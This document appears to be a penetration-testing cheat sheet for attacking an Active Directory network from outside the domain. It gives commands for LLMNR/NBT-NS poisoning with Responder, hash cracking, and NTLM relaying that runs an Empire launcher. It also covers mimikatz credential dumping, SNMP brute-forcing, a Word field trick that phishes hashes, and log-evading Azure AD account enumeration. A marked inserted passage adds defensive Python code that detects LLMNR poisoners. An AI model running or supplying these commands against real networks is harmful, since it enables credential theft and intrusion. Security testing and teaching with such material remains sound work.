Out of Domain (No credentials)

Identification

# Passive network listening to identify machines
# By default, netdiscover runs in interactive mode (incompatible with clean output)
# Use the -P option to disable interactive mode
sudo netdiscover -p -i eth0
sudo netdiscover -p -i eth0 -P

# You can find the domain name with a reverse lookup using dig
dig -x IP

# If NAC is blocking you, you can listen to broadcast traffic and collect MAC addresses
# Use a printer's MAC address to bypass NAC

LLMNR / NBT-NS

# You can Man-in-the-Middle using LLMNR and NBT-NS if they're badly configured
sudo responder -I eth0 -wFv

# If you get hashes, you will need to crack them
john --format=netntlmv2 --wordlist="/usr/share/wordlists/rockyou.txt" hash.txt
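The defensive counterpart to the poisoning above, as an added example that is not part of the original cheat sheet: query the LLMNR multicast group for a random hostname that cannot exist. A healthy segment stays silent, so any answer identifies a poisoner (Responder answers every name with its own address). The packet layout follows RFC 4795; the sample reply bytes are constructed for the offline check.

```python
import os
import socket
import struct
LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355

def encode_name(name):
    """Encode a hostname in DNS label format: len, label, ..., 0x00."""
    return b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"

def build_llmnr_query(name, txid):
    """LLMNR A query; RFC 4795 reuses the DNS header layout (flags=0, QDCOUNT=1)."""
    return struct.pack("!HHHHHH", txid, 0, 1, 0, 0, 0) + encode_name(name) + b"\x00\x01\x00\x01"

def skip_name(data, pos):
    """Return the offset just past a (possibly compressed) name starting at pos."""
    while data[pos] != 0 and data[pos] & 0xC0 != 0xC0:
        pos += 1 + data[pos]
    return pos + (2 if data[pos] & 0xC0 == 0xC0 else 1)

def parse_llmnr_response(data, txid):
    """IPv4 addresses in the answer section; [] unless data is a reply (QR=1) to txid."""
    if len(data) < 12 or struct.unpack("!H", data[:2])[0] != txid or not data[2] & 0x80:
        return []
    _, _, qd, an, _, _ = struct.unpack("!HHHHHH", data[:12])
    pos, addrs = 12, []
    for _ in range(qd):                       # skip the echoed question
        pos = skip_name(data, pos) + 4
    for _ in range(an):
        pos = skip_name(data, pos)
        rtype, _, _, rdlen = struct.unpack("!HHIH", data[pos:pos + 10])
        pos += 10
        if rtype == 1 and rdlen == 4:         # A record: the answering host's address
            addrs.append(socket.inet_ntoa(data[pos:pos + 4]))
        pos += rdlen
    return addrs

def probe(timeout=2.0):
    """Ask for a random, non-existent name. Returns (src_ip, answers) or None on silence."""
    name, txid = "probe-" + os.urandom(4).hex(), int.from_bytes(os.urandom(2), "big")
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.sendto(build_llmnr_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
    try:
        data, src = sock.recvfrom(1024)
    except socket.timeout:
        return None                           # no answer is the healthy result
    return src[0], parse_llmnr_response(data, txid)
# Constructed sample reply, as a poisoner at 10.0.2.15 would answer txid 0x1234.
SAMPLE_RESPONSE = (struct.pack("!HHHHHH", 0x1234, 0x8000, 1, 1, 0, 0) + encode_name("probe-abcd") + b"\x00\x01\x00\x01"
                   + encode_name("probe-abcd") + struct.pack("!HHIH", 1, 1, 30, 4) + bytes([10, 0, 2, 15]))
```

Run probe() periodically from a monitoring host on each VLAN; a non-None result is an alert, and the long-term fix is disabling LLMNR and NBT-NS by group policy.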

Responder and Multirelay

# You can chain Responder and MultiRelay to own machines

# It's important to know that SMB signing must be disabled on the target machines for MultiRelay.
# The SMB server must also be off in Responder: Responder will intercept and MultiRelay will relay the hashes

# HTTP and SMB are OFF in Responder.conf
responder -I eth0 -rv
responder -I <interface> -r -d -w

# All captured hashes are stored and can be retrieved using the DumpHash.py script
$ sudo python DumpHash.py
# You can check for machines with SMB signing disabled with RunFinger (impacket) or CrackMapExec
python RunFinger.py -i 10.0.2.0/24
cme smb <CIDR> --gen-relay-list targets.txt

# Then target one machine or one range with MultiRelay
python MultiRelay.py -t 10.0.2.4 -u ALL
ntlmrelayx.py -tf targets.txt
ntlmrelayx.py -tf targets.txt -c <insert your Empire Powershell launcher here>

# Then you can pop an interactive shell
# and use, for example, mimikatz
mimi sekurlsa::logonpasswords

NTLM Relaying and Proxychains

# Use the SOCKS option when there are multiple sessions to handle
# You can specify a target like this: all://10.1.2.10
# It will target smb://, mssql://, http://, https://, imap://, imaps://, ldap://, ldaps:// and smtp://
./ntlmrelayx.py -tf /tmp/targets.txt -socks -smb2support

# HTTP and SMB are OFF in Responder.conf
responder -I eth0 -rv
responder -I <interface> -r -d -w

# If someone connects and is relayed,
# you can see the sessions
ntlmrelayx> socks

# To use sessions, proxychains can be set up
# /etc/proxychains.conf must be pointing toward the target host

# Then you can use different tools to interact with the relayed sessions
# For example, connect through SMB
# If a password is asked for, enter anything
proxychains smbclient //192.168.48.230/Users -U contoso/normaluser1
proxychains ./mssqlclient.py contoso/normaluser1@192.168.48.230 -windows-auth

SNMP Communities

# You can use metasploit to enumerate known SNMP communities
auxiliary/scanner/snmp/snmp_enum

# OneSixtyOne is another tool
onesixtyone <target> public

# Bruteforce using a dictionary
onesixtyone -c wordlist <target>

# Or you can use snmp-check
snmp-check -t 192.168.1.2 -c public/private

Phishing with Responder

# Open Word -> CTRL + F9
# IMPORT "\\\\Responder-IP\\1.jpg"
# Right click and select "Edit Field"
# Tick "Data not stored in document"
# Save & close.
# Open the document -> free credentials :)

Azure AD Recon

https://www.synacktiv.com/posts/pentest/azure-ad-introduction-for-red-teamers.html

# https://login.microsoftonline.com/getuserrealm.srf?login=username@gothamlab.onmicrosoft.com&xml=1
# If the NameSpaceType indicates "Managed", then the company is using Azure AD.

# Discover accounts
# o365creeper can be used; it does not produce logs on the AD side
https://github.com/LMGsec/o365creeper